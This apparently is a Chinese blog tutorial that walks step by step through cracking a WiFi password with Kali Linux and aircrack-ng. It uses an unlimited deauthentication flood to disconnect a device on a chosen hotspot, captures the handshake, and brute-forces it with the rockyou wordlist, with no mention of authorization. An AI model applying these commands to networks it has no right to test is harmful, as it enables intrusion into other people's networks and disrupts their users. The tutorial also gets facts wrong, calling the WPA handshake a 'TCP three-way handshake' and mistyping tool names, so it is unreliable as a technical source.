kali Linux暴力破解WiFi密码

工具:Vmware虚拟机、kali镜像文件、无线网卡一个、手机一台(用于连接WiFi热点)

PS:无线网卡一定得是外置的,虽然电脑本身带有内置网卡,但并无监听周围热点功能;我这里使用的是USB网卡:TP-Link牌子

暴力破解思路:kali系统接入无线网卡,并通过里面的aircrack程序开始监听周围热点,选择一个WiFi热点,用aircrack去攻击一台连接了该WiFi热点的设备,使其掉线,之后这台设备(手机/电脑)肯定会再次自动来连接,我方利用伪装的挂载设备去接受设备(电脑/手机)发送的tcp三次握手数据包(里面包含了加密的WiFi密码)。此时我们只要用kali里面自带的密码字典文件去穷举该数据包,直到找到WiFi密码为止就成功了。


(上图来自网上,大致思路类似上图)

实例验证

1. 用虚拟机搭建kali系统,并外接入无线网卡

(kali下载地址:见官网,PS:安装时一定要选择http版,至于32位还是64位取决于个人电脑。

    安装教程https://blog.csdn.net/lunar_queen/article/details/60963729



2. 建立监听热点机制

2.1.查看无线网卡是否接入成功,成功会看到wlan0出现


2.2  airmon-ngcheck kill// 杀死一切干扰无线网卡监听热点的信号

2.3  airmon-ng start wlan0   //wlan0是无线网卡的名称,该操作是载入自己的网卡名

2.4  ifconfig -a //该操作是激活无线网卡,此时无线网卡的名称将变成wlan0mon,之前是wlan0

3.airodump-ng wlan0mon  //该操作是开始监听周围WiFi热点,显示各个WiFi热点(ctrl C停止监听)


3.1 选取WiFi热点:FBI Warning进行攻击

airodump-ng -c 频道(ch) --bssidbssid -w /root/桌面(用来存储抓包的目录)网卡名


//该操作是抓包,当新建一个终端去攻击连接WiFi的设备掉线后,我们抓到的tcp包就是存储在/root/桌面这个路径上

3.2新建一个终端:键入airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(一般为wlan0mon)

// (0为用deauth洪水攻击WiFi设备的次数,0为无限,-0 5则攻击5次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码)

PS:为什么要穷举,而不是直接从数据包里面获取密码?因为数据包里面的密码是哈希加密的,哈希加密只能正向,不能反向推导,所以需要一个个正向推导,直到找到正确的密码。

Ctrl+c停止洪泛攻击,此时返回前一个终端,可看到抓到的tcp包

4.暴力破解

4.1解压kali自带的字典文件  路径:/usr/share/wordlists/rockyou.txt.gz

      键入 :gzip -d/usr/share/wordlists/rockyou.txt.gz

4.2 键入 aircrack-ng -w 字典路径(kali有自带的字典文件,解压路径为:/usr/share/wordlists/rockyou.txt) /root/桌面/桌面-01.cap(握手包),回车后开始爆破

如:aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/桌面-0.1.cap

5.最终成功找到密码:


阅读更多

没有更多推荐了,返回首页